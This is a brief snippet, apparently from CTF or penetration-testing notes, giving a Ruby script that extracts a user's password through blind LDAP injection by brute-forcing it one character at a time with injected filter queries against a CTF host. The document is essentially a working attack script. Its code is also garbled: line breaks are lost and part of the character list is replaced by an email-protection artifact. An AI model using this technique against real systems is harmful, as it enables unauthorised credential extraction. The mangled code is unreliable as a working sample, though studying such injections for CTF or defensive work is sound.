The is a very basic script that will retrieve the password of a user in a Blind LDAP Injection case by bruteforcing all characters one by one.
#!/usr/bin/env rubyrequire 'net/http'alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '[email protected]{}-/()!"$%=^[]:;'.split('')flag = ''(0..50).each do |i|puts("[i] Looking for number #{i}")alphabet.each do |char|r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))if /TRUE CONDITION/.match?(r)flag += charputs("[+] Flag: #{flag}")breakendendend